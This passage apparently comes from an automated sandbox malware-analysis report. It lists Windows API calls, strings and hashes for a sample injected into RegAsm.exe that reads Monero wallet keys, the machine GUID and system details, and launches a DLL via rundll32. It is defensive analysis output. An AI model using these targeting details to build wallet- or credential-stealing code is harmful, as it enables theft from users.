                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                                                        • _memset.LIBCMT ref: 0040FBC1
                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                                                          • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: OpenProcess_memmove_memset
                                                                                                                                                        • String ID: N0ZWFt
                                                                                                                                                        • API String ID: 2647191932-431618156
                                                                                                                                                        • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                        • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                                                        • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                        • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                        • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                        • String ID: V@
                                                                                                                                                        • API String ID: 2311089104-383300688
                                                                                                                                                        • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                        • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                                                        • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                        • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                          • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                          • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                          • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                          • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                        • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00411607
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                        • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CharOpenQueryValue_memset
                                                                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                        Strings
                                                                                                                                                        • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                        • wallet_path, xrefs: 00401A9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                        • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                        • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                        • _memset.LIBCMT ref: 004010D0
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                        • API String ID: 2215929589-2108736111
                                                                                                                                                        • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                        • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                                                        • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                        • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004116CE
                                                                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                        • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                        • String ID: Unknown
                                                                                                                                                        • API String ID: 2781187439-1654365787
                                                                                                                                                        • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                        • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                                                        • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                        • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                        • wsprintfA.USER32 ref: 0041117A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                        • String ID: %d MB
                                                                                                                                                        • API String ID: 3644086013-2651807785
                                                                                                                                                        • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                        • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                                                        • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                        • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID: Windows 11
                                                                                                                                                        • API String ID: 3676486918-2517555085
                                                                                                                                                        • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                        • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                                                        • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                        • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID: CurrentBuildNumber
                                                                                                                                                        • API String ID: 3676486918-1022791448
                                                                                                                                                        • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                        • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                                                        • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                        • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004156A4
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$OpenQueryValue_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3357907479-0
                                                                                                                                                        • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                        • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                                                        • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                        • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CreatePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2024441833-0
                                                                                                                                                        • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                        • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                                                        • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                        • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C61C947
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C61C969
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C61C9A9
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C61C9C8
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C61C9E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4191843772-0
                                                                                                                                                        • Opcode ID: 3d16d75e0a6152c015c0d08e1639128c2c4dd824fd0d44b3c4cbda8a940574d9
                                                                                                                                                        • Instruction ID: 9182dbbd48fbfa99d53aa6aca542cc13d50452dc9498d6d92e0f72b7ad89a2d8
                                                                                                                                                        • Opcode Fuzzy Hash: 3d16d75e0a6152c015c0d08e1639128c2c4dd824fd0d44b3c4cbda8a940574d9
                                                                                                                                                        • Instruction Fuzzy Hash: E2212C317062147BDB04AA69CCC4BAE73B9AB87745F500529FA07A7E40DB705C048BBD
                                                                                                                                                        APIs
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                        • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                        • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1274457161-0
                                                                                                                                                        • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                        • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                                                        • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                        • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                                                        Strings
                                                                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmp
